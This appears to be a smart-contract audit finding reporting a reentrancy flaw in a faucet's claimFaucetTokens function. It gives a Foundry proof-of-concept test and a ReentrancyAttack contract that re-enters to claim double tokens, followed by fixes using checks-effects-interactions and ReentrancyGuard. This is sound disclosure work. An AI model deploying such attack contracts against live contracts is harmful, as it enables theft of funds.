Raisebox Faucet
First Flight #50
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

[H-02] CEI violation causes reentrancy attack vector

dakavon

CEI violation causes reentrancy attack vector

Description

  • The Checks-Effects-Interactions (CEI) pattern should be strictly followed to prevent reentrancy attacks. A contract state update should be complete before making and external calls that could cause a reentrancy attack.

  • Issue: claimFaucetToken() violates the CEI pattern by performing an external call (ETH transfer) in the middle of the function. This allows an attacker to reenter this function and receive twice the $RB tokens amount as intendet.

...
if (dailyDrips + sepEthAmountToDrip <= dailySepEthCap && address(this).balance >= sepEthAmountToDrip) {
hasClaimedEth[faucetClaimer] = true;
dailyDrips += sepEthAmountToDrip;
@> (bool success,) = faucetClaimer.call{value: sepEthAmountToDrip}("");
if (success) {
emit SepEthDripped(faucetClaimer, sepEthAmountToDrip);
} else {
revert RaiseBoxFaucet_EthTransferFailed();
}
...

Risk

Likelihood:

  • High: Easily exploitable by any malicious contract

Impact:

  • Violation of smart contract security pattern

  • Attackers can steal tokens directly from the faucet at a double rate (only once per address)

Proof of Concept

Attacker receives ETH once but double the token amount:

function test_claimFaucetTokens_ReentrancyAttack() public {
// RaiseBoxFaucet token balance before the attack\
uint256 faucetTokenBalanceBefore = raiseBoxFaucet.balanceOf(address(raiseBoxFaucet));
uint256 faucetEthBalanceBefore = address(raiseBoxFaucet).balance;
console.log("Initial RaiseBoxFaucet token balance:", faucetTokenBalanceBefore);
console.log("Initial ETH balance in faucet:", faucetEthBalanceBefore);
// Deploy the attack contract
vm.prank(blackHat);
ReentrancyAttack attackerContract = new ReentrancyAttack(address(raiseBoxFaucet));
// Attacker contract token balance before the attack
uint256 attackerTokenBalanceBefore = raiseBoxFaucet.balanceOf(address(attackerContract));
uint256 attackerEthBalanceBefore = address(attackerContract).balance;
console.log("Attacker contract token balance before attack:", attackerTokenBalanceBefore);
console.log("Attacker contract ETH balance before attack:", attackerEthBalanceBefore);
// Warp time to ensure the faucet is claimable
vm.warp(block.timestamp + 3 days);
vm.roll(block.number + 1);
// Start the attack
vm.prank(blackHat);
attackerContract.attack();
// RaiseBoxFaucet token balance after the attack
uint256 faucetTokenBalanceAfter = raiseBoxFaucet.balanceOf(address(raiseBoxFaucet));
uint256 faucetEthBalanceAfter = address(raiseBoxFaucet).balance;
console.log("RaiseBoxFaucet token balance after attack:", faucetTokenBalanceAfter);
console.log("ETH balance in faucet after attack:", faucetEthBalanceAfter);
// Attacker contract token balance after the attack
uint256 attackerTokenBalanceAfter = raiseBoxFaucet.balanceOf(address(attackerContract));
uint256 attackerEthBalanceAfter = address(attackerContract).balance;
console.log("Attacker contract token balance after attack:", attackerTokenBalanceAfter);
console.log("Attacker contract ETH balance after attack:", attackerEthBalanceAfter);
// Attacker contact could get 0.005 ETH but twice the RB tokens as intended
assertEq(attackerEthBalanceAfter, attackerEthBalanceBefore + raiseBoxFaucet.sepEthAmountToDrip());
assertEq(attackerTokenBalanceAfter, attackerTokenBalanceBefore + 2 * raiseBoxFaucet.faucetDrip());
}
}
contract ReentrancyAttack {
RaiseBoxFaucet raiseBoxFaucet;
address owner;
constructor(address _raiseBoxFaucet) {
raiseBoxFaucet = RaiseBoxFaucet(payable(_raiseBoxFaucet));
owner = msg.sender;
}
function attack() external {
raiseBoxFaucet.claimFaucetTokens();
// Transfer remaining ETH to the owner + RB tokens
// payable(owner).transfer(address(this).balance);
// uint256 tokenBalance = raiseBoxFaucet.balanceOf(address(this));
// raiseBoxFaucet.transfer(owner, tokenBalance);
}
receive() external payable {
raiseBoxFaucet.claimFaucetTokens();
}
}

Recommended Mitigation

Fix CEI pattern entirely by e.g. remember ETH claim eligibility and send later

or add openzeppelin's reentrancy guard to claimFaucetToken

// Checks
...
// Check ETH drip eligibility
bool canReceiveEth = !hasClaimedEth[msg.sender] && !sepEthDripsPaused;
bool dailySepEthCapNotReached = currentDailyDrips + sepEthAmountToDrip <= dailySepEthCap;
bool contractHoldsEnoughSepEth = address(this).balance >= sepEthAmountToDrip
if (canReceiveEth && dailySepEthCapNotReached && contractHoldsEnoughSepEth) {
ethToSend = sepEthAmountToDrip;
}
}
// Effects
// Interactions
if (ethToSend > 0) {
(bool success,) = msg.sender.call{value: ethToSend}("");
if (success) {
emit SepEthDripped(msg.sender, ethToSend);
} else {
revert RaiseBoxFaucet_EthTransferFailed();
}
}
- remove this code
+ add this code
// SPDX-Lincense-Identifier: MIT
pragma solidity ^0.8.30;
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
+ import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";
- contract RaiseBoxFaucet is ERC20, Ownable {
+ contract RaiseBoxFaucet is ERC20, Ownable, ReentrancyGuard {
....
- function claimFaucetTokens() public {
+ function claimFaucetTokens() public nonReentrant {
....
Updates

Lead Judging Commences

inallhonesty Lead Judge 6 days ago
Submission Judgement Published
Validated
Assigned finding tags:

Reentrancy in `claimFaucetTokens`

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.